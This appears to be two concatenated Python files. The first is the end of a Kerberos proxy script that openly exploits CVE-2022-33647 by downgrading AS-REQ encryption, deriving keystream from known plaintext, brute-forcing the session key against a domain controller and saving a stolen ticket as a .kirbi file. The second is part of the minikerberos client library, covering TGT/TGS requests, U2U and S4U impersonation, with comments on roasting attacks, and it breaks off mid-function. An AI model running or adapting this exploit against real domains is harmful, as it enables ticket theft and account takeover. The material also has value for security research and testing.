			ticketnative['req-body']['addresses'] = get_padding_data()
			modded_ticket = AS_REQ(ticketnative).dump()
			_, err = await self.send_ticket(dcwriter, modded_ticket)
			if err is not None:
				raise err
			print('[+] Submitting original AS-REQ to DC')
			rticketdata, rticket, rticketnative, err = await self.read_ticket(dcreader)
			if err is not None:
				raise err
			print('[+] Got AS-REP with the correct enctype!')
			cipher_data = rticketnative['enc-part']['cipher'][24:]
			known_plaintext = calc_known_plaintext(rticketnative['enc-part']['cipher'][24:])
			if len(known_plaintext) < 21:
				print('[-] AS-REP cipher data too short! Will not work..')
				return
			print('[i] ENC TIMESTAMP: %s' % enc_timestamp.hex())
			print('[i] AS-REP CIPHER: %s' % cipher_data.hex()[:0x40])
			
			
			ts_bytes = enc_timestamp[len(known_plaintext):]
			cipher_bytes = cipher_data[len(known_plaintext):]
			keystream = byte_xor(ts_bytes, ts_len_hdr_lookup[len(enc_timestamp)])
			dec_key = byte_xor(keystream, cipher_bytes)
			print('[i] ENC BYTESTREAM   : %s' % ts_bytes.hex())
			print('[i] CIP BYTESTREAM   : %s' % cipher_bytes.hex()[:0x40])
			print('[i] KNOWN PLAINTEXT  : %s' % known_plaintext.hex())
			print('[i] KEYSTREAM FROM TS: %s' % keystream.hex())
			print('[i] DEC KEY - 4 BYTES: %s' % dec_key.hex())
			print('[+] Guessing last bytes of the session key...')
			target = KerberosTarget(self.dc_ip)
			credential = KerberosCredential()
			credential.username = ticketnative['req-body']['cname']['name-string'][0]
			credential.domain = ticketnative['req-body']['realm']
			credential.password = 'A'
			client = AIOKerberosClient(credential, target)
			client.kerberos_TGT = rticketnative
			for i in range(256):
				i = i.to_bytes(1, byteorder='big', signed=False)
				keyguess = dec_key + i + b'\xAB'*11
				print('[i] GUESSING KEY: %s' % keyguess.hex())
				
				client.kerberos_TGT = rticketnative
				client.kerberos_cipher = _enctype_table[-128]
				client.kerberos_cipher_type = -128
				client.kerberos_session_key = Key(-128, keyguess)
				try:
					await client.get_TGS(KerberosSPN.from_upn('krbtgt@test.corp'))
				except Exception as e:
					continue
				else:
					now = datetime.datetime.now(datetime.timezone.utc).replace(microsecond=0)
					print('[+] GUESSED CORRECTLY! SESSIONKEY: %s' % keyguess.hex())
					kirbi = tgt_to_kirbi(rticketnative, keyguess, now).dump()
					print('[+] KIRBI DATA:')
					print(format_kirbi(kirbi))
					filename = '%s.kirbi' % (now.strftime("%Y%m%d_%H%M%S"))
					print('[+] Writing .kirbi file to: %s' % filename)
					with open(filename, 'wb') as f:
						f.write(kirbi)
					return

		except Exception as e:
			traceback.print_exc()
			#return None, e
		finally:
			if dcwriter is not None:
				dcwriter.close()
			writer.close()

	
	async def run(self):
		try:
			server = await asyncio.start_server(self.handle_client, host=self.listen_ip, port=self.listen_port)
			async with server:
				await server.serve_forever()

			return True, None
		except Exception as e:
			traceback.print_exc()
			return None, e

async def amain():
	import argparse
	parser = argparse.ArgumentParser(description='Kerberos proxy to exploit CVE-2022-33647')
	parser.add_argument('dcip', help='IP/hostname of the domain controller')
	parser.add_argument('--dc-port', default=88, type=int, help='Port of the Kerberos service on the DC.')
	parser.add_argument('--listen-ip', default='127.0.0.1', help='IP/hostname to listen for incoming kerberos traffic')
	parser.add_argument('--listen-port', default=88, type=int, help='IP/hostname to listen for incoming kerberos traffic')
	args = parser.parse_args()

	kp = KerberosProxy(args.dcip, args.listen_ip, args.dc_port, args.listen_port)
	await kp.run()

def main():
	asyncio.run(amain())

if __name__ == '__main__':
	main()


from __future__ import annotations
from unicrypto import hashlib
import collections
import datetime
import secrets
from typing import List

from minikerberos import logger
from minikerberos.common.ccache import CCACHE
from minikerberos.common.spn import KerberosSPN
from minikerberos.protocol.asn1_structs import METHOD_DATA, ETYPE_INFO, ETYPE_INFO2, \
	PADATA_TYPE, PA_PAC_REQUEST, PA_ENC_TS_ENC, EncryptedData, krb5_pvno, KDC_REQ_BODY, \
	AS_REQ, TGS_REP, KDCOptions, PrincipalName, EncASRepPart, EncTGSRepPart, PrincipalName, Realm, \
	Checksum, APOptions, Authenticator, Ticket, AP_REQ, TGS_REQ, CKSUMTYPE, \
	PA_FOR_USER_ENC, PA_PAC_OPTIONS, PA_PAC_OPTIONSTypes, EncTicketPart

from minikerberos.protocol.errors import KerberosErrorCode, KerberosError
from minikerberos.protocol.encryption import Key, _enctype_table, _HMACMD5, Enctype, _checksum_table
from minikerberos.protocol.constants import PaDataType, EncryptionType, NAME_TYPE, MESSAGE_TYPE
from minikerberos.protocol.structures import AuthenticatorChecksum
from minikerberos.gssapi.gssapi import GSSAPIFlags
from minikerberos.network.aioclientsocket import AIOKerberosClientSocket

from minikerberos.common.creds import KerberosCredential
from minikerberos.common.target import KerberosTarget
from minikerberos.protocol.rfc4556 import PKAuthenticator, AuthPack, PA_PK_AS_REP, KDCDHKeyInfo, PA_PK_AS_REQ
from minikerberos.gssapi.channelbindings import ChannelBindingsStruct
from minikerberos.protocol.ticketutils import construct_apreq_from_tgs_tgt

from asn1crypto import cms
from asn1crypto import core

class AIOKerberosClient:
	def __init__(self, ccred:KerberosCredential, target:KerberosTarget):
		self.credential = ccred
		self.target = target
		self.ksoc = AIOKerberosClientSocket(self.target)
		self.ccache = CCACHE()
		if ccred is not None:
			self.ccache = CCACHE() if self.credential.ccache is None else self.credential.ccache
		
		self.pkinit_tkey = None
		self.kerberos_session_key = None
		self.kerberos_TGT = None
		self.kerberos_TGT_encpart = None
		self.kerberos_TGS = None
		self.kerberos_cipher = None
		self.kerberos_cipher_type = None
		self.kerberos_key = None
		self.server_salt = None

	def build_asreq_lts(self, supported_encryption_method, kdcopts:List[str] = ['forwardable','renewable','proxiable'], enctimestamp=None, newnow=None, no_preauth = False, kdc_req_body_extra = None, with_pac:bool = True) -> AS_REQ:
		logger.debug('Constructing TGT request with auth data')
		#now to create an AS_REQ with encrypted timestamp for authentication
		padatas = []
		
		if with_pac is True:
			pa_data_1 = {}
			pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
			pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
			padatas.append(pa_data_1)
		
		logger.debug('Selecting common encryption type: %s' % supported_encryption_method.name)
		now = datetime.datetime.now(datetime.timezone.utc)
		if no_preauth is False:
			if enctimestamp is None:
				#creating timestamp asn1
				timestamp = PA_ENC_TS_ENC({'patimestamp': now.replace(microsecond=0), 'pausec': now.microsecond}).dump()
				self.kerberos_cipher = _enctype_table[supported_encryption_method.value]
				self.kerberos_cipher_type = supported_encryption_method.value
				self.kerberos_key = Key(self.kerberos_cipher.enctype, self.credential.get_key_for_enctype(supported_encryption_method, salt = self.server_salt))
				enc_timestamp = self.kerberos_cipher.encrypt(self.kerberos_key, 1, timestamp, None)
			else:
				now = newnow
				enc_timestamp = enctimestamp
			
			pa_data_2 = {}
			pa_data_2['padata-type'] = int(PADATA_TYPE('ENC-TIMESTAMP'))
			pa_data_2['padata-value'] = EncryptedData({'etype': supported_encryption_method.value, 'cipher': enc_timestamp}).dump()
			padatas.append(pa_data_2)

		kdc_req_body = {}
		kdc_req_body['kdc-options'] = KDCOptions(set(kdcopts))
		kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': self.credential.username.split('/')})
		kdc_req_body['realm'] = self.credential.domain.upper()
		kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.credential.domain.upper()]})
		kdc_req_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
		kdc_req_body['rtime'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
		kdc_req_body['nonce'] = secrets.randbits(31)
		kdc_req_body['etype'] = [supported_encryption_method.value] #selecting according to server's preferences
		
		if kdc_req_body_extra is not None:
			for key in kdc_req_body_extra:
				kdc_req_body[key] = kdc_req_body_extra[key]
		
		kdc_req = {}
		kdc_req['pvno'] = krb5_pvno
		kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
		kdc_req['padata'] = padatas
		kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
		
		return AS_REQ(kdc_req)
	
	def build_asreq_pkinit(self, supported_encryption_method, kdcopts = ['forwardable','renewable','renewable-ok'], with_pac:bool = True) -> AS_REQ:
		from asn1crypto import keys

		if supported_encryption_method.value == 23:
			raise Exception('RC4 encryption is not supported for certificate auth!')


		now = datetime.datetime.now(datetime.timezone.utc)

		kdc_req_body_data = {}
		kdc_req_body_data['kdc-options'] = KDCOptions(set(kdcopts))
		kdc_req_body_data['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': self.credential.username.split('/')})
		kdc_req_body_data['realm'] = self.credential.domain.upper()
		kdc_req_body_data['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': ['krbtgt', self.credential.domain.upper()]})
		kdc_req_body_data['till']  = (now + datetime.timedelta(days=1)).replace(microsecond=0)
		kdc_req_body_data['rtime'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
		kdc_req_body_data['nonce'] = secrets.randbits(31)
		kdc_req_body_data['etype'] = [supported_encryption_method.value] #[18,17] # 23 breaks...
		kdc_req_body = KDC_REQ_BODY(kdc_req_body_data)


		checksum = hashlib.sha1(kdc_req_body.dump()).digest()

		authenticator = {}
		authenticator['cusec'] = now.microsecond
		authenticator['ctime'] = now.replace(microsecond=0)
		authenticator['nonce'] = secrets.randbits(31)
		authenticator['paChecksum'] = checksum


		dp = {}
		dp['p'] = self.credential.dhparams.p
		dp['g'] = self.credential.dhparams.g
		dp['q'] = 0 # mandatory parameter, but it is not needed

		pka = {}
		pka['algorithm'] = '1.2.840.10046.2.1'
		pka['parameters'] = keys.DomainParameters(dp)

		spki = {}
		spki['algorithm'] = keys.PublicKeyAlgorithm(pka)
		spki['public_key'] = self.credential.dhparams.get_public_key()


		authpack = {}
		authpack['pkAuthenticator'] = PKAuthenticator(authenticator)
		authpack['clientPublicValue'] = keys.PublicKeyInfo(spki)
		authpack['clientDHNonce'] = self.credential.dhparams.dh_nonce

		authpack = AuthPack(authpack)
		signed_authpack = self.credential.sign_authpack(authpack.dump(), wrap_signed = True)

		payload = PA_PK_AS_REQ()
		payload['signedAuthPack'] = signed_authpack

		padatas = []
		if with_pac is True:
			pa_data_0 = {}
			pa_data_0['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
			pa_data_0['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
			padatas.append(pa_data_0)
		
		pa_data_1 = {}
		pa_data_1['padata-type'] = PaDataType.PK_AS_REQ.value
		pa_data_1['padata-value'] = payload.dump()
		padatas.append(pa_data_1)

		asreq = {}
		asreq['pvno'] = 5
		asreq['msg-type'] = 10
		asreq['padata'] = padatas
		asreq['req-body'] = kdc_req_body

		return AS_REQ(asreq)


	async def do_preauth(self, supported_encryption_method, kdcopts = ['forwardable','renewable','renewable-ok'], with_pac:bool = True):
		if self.credential.certificate is not None:
			req = self.build_asreq_pkinit(supported_encryption_method, kdcopts, with_pac=with_pac)
		else:
			req = self.build_asreq_lts(supported_encryption_method, kdcopts, with_pac=with_pac)

		
		logger.debug('Sending TGT request to server')
		rep = await self.ksoc.sendrecv(req.dump())
		if rep.name == 'KRB_ERROR':
			raise KerberosError(rep, 'Preauth failed!')
		return rep

	def tgt_from_ccache(self):
		try:
			if self.ccache is None:
				raise Exception('No CCACHE file found')
			
			tgt, keystruct, err = self.ccache.get_tgt(self.credential.username, self.credential.domain, self.credential.ccache_spn_strict_check)
			if err is not None:
				raise err
			self.kerberos_TGT = tgt
			self.kerberos_TGT_encpart = tgt['enc-part']
			self.kerberos_session_key = Key(keystruct['keytype'], keystruct['keyvalue'])
			self.kerberos_cipher = _enctype_table[keystruct['keytype']]
			self.kerberos_cipher_type = keystruct['keytype']
			return True, None
		except Exception as e:
			return None, e

	def select_preferred_encryption_method(self, rep):
		#now getting server's supported encryption methods
		
		supp_enc_methods = collections.OrderedDict()
		for enc_method in METHOD_DATA.load(rep['e-data']).native:
			data_type = PaDataType(enc_method['padata-type'])
			
			if data_type == PaDataType.ETYPE_INFO or data_type == PaDataType.ETYPE_INFO2:
				if data_type == PaDataType.ETYPE_INFO:
					enc_info_list = ETYPE_INFO.load(enc_method['padata-value'])
					
				elif data_type == PaDataType.ETYPE_INFO2:
					enc_info_list = ETYPE_INFO2.load(enc_method['padata-value'])
		
				for enc_info in enc_info_list.native:
					supp_enc_methods[EncryptionType(enc_info['etype'])] = enc_info['salt']
					logger.debug('Server supports encryption type %s with salt %s' % (EncryptionType(enc_info['etype']).name, enc_info['salt']))
		
		preferred_enc_type = self.credential.get_preferred_enctype(supp_enc_methods)
		if preferred_enc_type not in supp_enc_methods:
			raise Exception('Preferred enc type not in supported enctypes')
		salt = supp_enc_methods[preferred_enc_type]
		if salt is not None:
			salt = salt.encode()
		self.server_salt = salt #enc_info['salt'].encode()
		return preferred_enc_type


	async def get_TGT(self, override_etype = None, decrypt_tgt = True, kdcopts = ['forwardable','renewable','proxiable'], override_sname:KerberosSPN = None, with_pac:bool = True):
		"""
		decrypt_tgt: used for asreproast attacks
		Steps performed:
			1. Send and empty (no encrypted timestamp) AS_REQ with all the encryption types we support
			2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
			3. PROFIT
		"""

		#first, let's check if CCACHE has the correct ticket already
		_, err = self.tgt_from_ccache()
		if err is None:
			return
		
		logger.debug('Generating initial TGT without authentication data')
		now = datetime.datetime.now(datetime.timezone.utc)
		kdc_req_body = {}
		kdc_req_body['kdc-options'] = KDCOptions(set(kdcopts))
		kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': self.credential.username.split('/')})
		kdc_req_body['realm'] = self.credential.domain.upper()
		if override_sname is None:
			kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.credential.domain.upper()]})
		else:
			# if we want to directly kerberoast with no-preauth user
			kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': override_sname.get_principalname()})
		kdc_req_body['till']  = (now + datetime.timedelta(days=1)).replace(microsecond=0)
		kdc_req_body['rtime'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
		kdc_req_body['nonce'] = secrets.randbits(31)
		if override_etype is None:
			kdc_req_body['etype'] = self.credential.get_supported_enctypes()
		else:
			kdc_req_body['etype'] = override_etype

		pa_data_1 = {}
		if with_pac is True:
			pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
			pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
		
		kdc_req = {}
		kdc_req['pvno'] = krb5_pvno
		kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
		if len(pa_data_1) > 0:
			kdc_req['padata'] = [pa_data_1]
		kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
		
		req = AS_REQ(kdc_req)	
		
		logger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())
		rep = await self.ksoc.sendrecv(req.dump())
				
		if rep.name != 'KRB_ERROR':
			#user can do kerberos auth without preauthentication!
			rep = rep.native
			self.kerberos_TGT = rep

			#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt
			#so we just return, the asrep can be extracted from this object anyhow
			if decrypt_tgt == False or self.credential.nopreauth is True:
				return rep

			self.kerberos_cipher = _enctype_table[rep['enc-part']['etype']]
			self.kerberos_cipher_type = rep['enc-part']['etype']
			self.kerberos_key = Key(self.kerberos_cipher.enctype, self.credential.get_key_for_enctype(EncryptionType(rep['enc-part']['etype'])))
			
		else:
			if rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
				raise KerberosError(rep)
			rep = rep.native
			logger.debug('Got reply from server, asikg to provide auth data')
			supported_encryption_method = self.select_preferred_encryption_method(rep)
			
			rep = await self.do_preauth(supported_encryption_method, with_pac=with_pac)
			logger.debug('Got valid TGT response from server')
			rep = rep.native
			self.kerberos_TGT = rep


		
		if self.credential.certificate is not None:
			self.kerberos_TGT_encpart, self.kerberos_session_key, self.kerberos_cipher = self.decrypt_asrep_cert(rep)
			self.kerberos_cipher_type = supported_encryption_method.value

			self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
			logger.debug('Got valid TGT')
			return 
		
		else:
			cipherText = rep['enc-part']['cipher']
			temp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)
			try:
				self.kerberos_TGT_encpart = EncASRepPart.load(temp).native
			except Exception as e:
				logger.debug('EncAsRepPart load failed, is this linux?')
				try:
					self.kerberos_TGT_encpart = EncTGSRepPart.load(temp).native
				except Exception as e:
					logger.error('Failed to load decrypted part of the reply!')
					raise e
			
			self.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])
			self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
			logger.debug('Got valid TGT')
			
			return 

	def tgs_from_ccache(self, spn_user:KerberosSPN):
		try:
			if self.ccache is None:
				raise Exception('No CCACHE file found')
			
			tgs, keystruct, err = self.ccache.get_tgs(spn_user)
			if err is not None:
				raise err
			
			key = Key(keystruct['keytype'], keystruct['keyvalue'])
			tgs = TGS_REP(tgs).native
			return tgs, tgs['enc-part'], key, None			
		except Exception as e:
			return None, None, None, e

	async def get_TGS(self, spn_user:KerberosSPN, override_etype = None, is_linux = False):
		"""
		Requests a TGS ticket for the specified user.
		Retruns the TGS ticket, end the decrpyted encTGSRepPart.

		spn_user: KerberosTarget: the service user you want to get TGS for.
		override_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which is derived from the TGT) to be able to recieve whatever tgs tiecket 
		"""
		
		#first, let's check if CCACHE has the correct ticket already
		tgs, encTGSRepPart, key, err = self.tgs_from_ccache(spn_user)
		if err is None:
			return tgs, encTGSRepPart, key

		
		if self.kerberos_TGT is None:
			#let's check if CCACHE has a TGT for us
			_, err = self.tgt_from_ccache()
			if err is not None:
				raise Exception('No TGT found in CCACHE!')

		#nope, we need to contact the server
		logger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())
		now = datetime.datetime.now(datetime.timezone.utc)
		kdc_req_body = {}
		kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize']))
		kdc_req_body['realm'] = spn_user.domain.upper()
		kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
		kdc_req_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
		kdc_req_body['nonce'] = secrets.randbits(31)
		if override_etype:
			kdc_req_body['etype'] = override_etype
		else:
			if self.kerberos_cipher_type == -128:
				# we dunno how to do GSS api calls with -128 etype,
				# but we can request etype 23 here for which all is implemented
				kdc_req_body['etype'] = [23]
			else:
				kdc_req_body['etype'] = [self.kerberos_cipher_type]

		authenticator_data = {}
		authenticator_data['authenticator-vno'] = krb5_pvno
		authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
		authenticator_data['cname'] = self.kerberos_TGT['cname']
		authenticator_data['cusec'] = now.microsecond
		authenticator_data['ctime'] = now.replace(microsecond=0)
		
		if is_linux:
			ac = AuthenticatorChecksum()
			ac.flags = 0
			ac.channel_binding = b'\x00'*16
			
			chksum = {}
			chksum['cksumtype'] = 0x8003
			chksum['checksum'] = ac.to_bytes()


			authenticator_data['cksum'] = Checksum(chksum)
			authenticator_data['seq-number'] = 0
		
		authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
		
		ap_req = {}
		ap_req['pvno'] = krb5_pvno
		ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
		ap_req['ap-options'] = APOptions(set())
		ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
		ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
		
		pa_data_1 = {}
		pa_data_1['padata-type'] = PaDataType.TGS_REQ.value
		pa_data_1['padata-value'] = AP_REQ(ap_req).dump()
		
		
		kdc_req = {}
		kdc_req['pvno'] = krb5_pvno
		kdc_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
		kdc_req['padata'] = [pa_data_1]
		kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
		
		req = TGS_REQ(kdc_req)
		logger.debug('Constructing TGS request to server')
		rep = await self.ksoc.sendrecv(req.dump())
		if rep.name == 'KRB_ERROR':
			raise KerberosError(rep, 'get_TGS failed!')
		logger.debug('Got TGS reply, decrypting...')
		tgs = rep.native
		
		encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
		key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
		
		self.ccache.add_tgs(tgs, encTGSRepPart)
		logger.debug('Got valid TGS reply')
		self.kerberos_TGS = tgs
		return tgs, encTGSRepPart, key

	async def U2U(self, kdcopts = ['forwardable','renewable','canonicalize', 'enc-tkt-in-skey'], supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
		if not self.kerberos_TGT:
			logger.debug('[U2U] TGT is not available! Fetching TGT...')
			await self.get_TGT()

		supp_enc = self.credential.get_preferred_enctype(supp_enc_methods)
		now = datetime.datetime.now(datetime.timezone.utc)
		authenticator_data = {}
		authenticator_data['authenticator-vno'] = krb5_pvno
		authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
		authenticator_data['cname'] = self.kerberos_TGT['cname']
		authenticator_data['cusec'] = now.microsecond
		authenticator_data['ctime'] = now.replace(microsecond=0)


		authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)

		ap_req = {}
		ap_req['pvno'] = krb5_pvno
		ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
		ap_req['ap-options'] = APOptions(set())
		ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
		ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})

		pa_data_auth = {}
		pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
		pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()

		
		krb_tgs_body = {}
		krb_tgs_body['kdc-options'] = KDCOptions(set(kdcopts))
		krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': self.credential.username.split('/')})
		krb_tgs_body['realm'] = self.credential.domain.upper()
		krb_tgs_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
		krb_tgs_body['nonce'] = secrets.randbits(31)
		krb_tgs_body['etype'] = [23] # dunno why it must be 23?
		krb_tgs_body['additional-tickets'] = [Ticket(self.kerberos_TGT['ticket'])]
		
		
		krb_tgs_req = {}
		krb_tgs_req['pvno'] = krb5_pvno
		krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
		krb_tgs_req['padata'] = [pa_data_auth] #pa_for_user
		krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
		
		
		
		req = TGS_REQ(krb_tgs_req)
		logger.debug('[U2U] Sending request to server')
		
		reply = await self.ksoc.sendrecv(req.dump())
		if reply.name == 'KRB_ERROR':
			emsg = '[U2U] failed!'
			if reply.native['error-code'] == 16:
				emsg = '[U2U] Failed to get U2U! Error code (16) indicates that delegation is not enabled for this account!'			
			raise KerberosError(reply, emsg)
		
		logger.debug('[U2U] Got reply, decrypting...')
		tgs = reply.native

		cipher = _enctype_table[int(tgs['ticket']['enc-part']['etype'])]
		encticket = tgs['ticket']['enc-part']['cipher']
		decdata = cipher.decrypt(self.kerberos_session_key, 2, encticket)
		decticket = EncTicketPart.load(decdata).native

		encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
		key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
		self.ccache.add_tgs(tgs, encTGSRepPart)
		logger.debug('[U2U] Got valid TGS reply')

		return tgs, encTGSRepPart, key, decticket
	
	#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/6a8dfc0c-2d32-478a-929f-5f9b1b18a169
	async def S4U2self(self, user_to_impersonate, spn_user = None, kdcopts = ['forwardable','renewable','canonicalize']):
		"""
		user_to_impersonate : KerberosTarget class
		"""
		
		if not self.kerberos_TGT:
			logger.debug('[S4U2self] TGT is not available! Fetching TGT...')
			await self.get_TGT()
		
		auth_package_name = 'Kerberos'
		now = datetime.datetime.now(datetime.timezone.utc)
		
		
		###### Calculating authenticator data
		authenticator_data = {}
		authenticator_data['authenticator-vno'] = krb5_pvno
		authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
		authenticator_data['cname'] = self.kerberos_TGT['cname']
		authenticator_data['cusec'] = now.microsecond
		authenticator_data['ctime'] = now.replace(microsecond=0)
		
		authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
		
		ap_req = {}
		ap_req['pvno'] = krb5_pvno
		ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
		ap_req['ap-options'] = APOptions(set())
		ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
		ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
		
		
		pa_data_auth = {}
		pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
		pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()
		
		###### Calculating checksum data
		
		S4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)
		S4UByteArray += user_to_impersonate.username.encode()
		S4UByteArray += user_to_impersonate.domain.encode()
		S4UByteArray += auth_package_name.encode()
		logger.debug('[S4U2self] S4UByteArray: %s' % S4UByteArray.hex())
		logger.debug('[S4U2self] S4UByteArray: %s' % S4UByteArray)
		
		chksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)
		logger.debug('[S4U2self] chksum_data: %s' % chksum_data.hex())
		
		
		chksum = {}
		chksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))
		chksum['checksum'] = chksum_data

		
		###### Filling out PA-FOR-USER data for impersonation
		pa_for_user_enc = {}
		pa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})
		pa_for_user_enc['userRealm'] = user_to_impersonate.domain
		pa_for_user_enc['cksum'] = Checksum(chksum)
		pa_for_user_enc['auth-package'] = auth_package_name
		
		pa_for_user = {}
		pa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))
		pa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()
	
		###### Constructing body
		if spn_user is not None:
			if isinstance(spn_user, str):
				spn_user = [spn_user]
			elif isinstance(spn_user, list):
				spn_user = spn_user
			else:
				spn_user = spn_user.get_principalname()
		else:
			spn_user = self.credential.username.split('/')

		
		krb_tgs_body = {}
		krb_tgs_body['kdc-options'] = KDCOptions(set(kdcopts))
		krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': spn_user})
		krb_tgs_body['realm'] = self.credential.domain.upper()
		krb_tgs_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
		krb_tgs_body['nonce'] = secrets.randbits(31)
		krb_tgs_body['etype'] = [self.kerberos_session_key.enctype] #[supp_enc.value] #selecting according to server's preferences
		
		
		krb_tgs_req = {}
		krb_tgs_req['pvno'] = krb5_pvno
		krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
		krb_tgs_req['padata'] = [pa_data_auth, pa_for_user]
		krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
		
		req = TGS_REQ(krb_tgs_req)
		
		logger.debug('[S4U2self] Sending request to server')
		
		reply = await self.ksoc.sendrecv(req.dump())
		if reply.name == 'KRB_ERROR':
			emsg = 'S4U2self failed!'
			if reply.native['error-code'] == 16:
				emsg = 'S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account!'			
			raise KerberosError(reply, emsg)
		
		logger.debug('[S4U2self] Got reply, decrypting...')
		tgs = reply.native
		
		encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
		key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
		
		self.ccache.add_tgs(tgs, encTGSRepPart)
		logger.debug('[S4U2self] Got valid TGS reply')
		self.kerberos_TGS = tgs
		return tgs, encTGSRepPart, key
		
	# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/c920c148-8a9c-42e9-b8e9-db5755cd281b
	async def S4U2proxy(self, s4uself_ticket, spn_user):
		logger.debug('[S4U2proxy] Impersonating %s' % '/'.join(spn_user.get_principalname()))
		now = datetime.datetime.now(datetime.timezone.utc)
		
		pa_pac_opts = {}
